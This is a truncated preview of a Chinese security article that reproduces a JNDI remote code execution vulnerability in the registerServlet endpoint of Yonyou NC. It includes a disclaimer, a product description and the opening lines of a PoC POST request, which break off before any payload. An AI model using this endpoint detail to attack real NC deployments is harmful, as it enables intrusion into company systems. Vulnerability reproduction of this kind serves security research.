【成功复现】用友NC系统JNDI 远程代码执行漏洞(JNDI)

文章预览

网安引领时代，弥天点亮未来       0x00写在前面       本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！ 0x01漏洞介绍 用友NC是一款企业级的管理软件。它基于互联网应用，具有强大的集团管控功能和灵活的自定义功能，可以满足企业复杂业务流程的需求。同时，NC还提供了全程的客户化服务能力，能够快速响应用户的业务需求。总体来说，用友NC是一款功能全面、使用灵活的企业管理软件，能够广泛应用于各种类型的企业，助力其实现信息化和数字化管理， 用友NC registerServlet接口处存在JNDI 远程代码执行漏洞。 0x02影响版本 用友-UFIDA-NC 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC （POST） 漏洞复现 POST /portal/registerServlet HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko ………………………………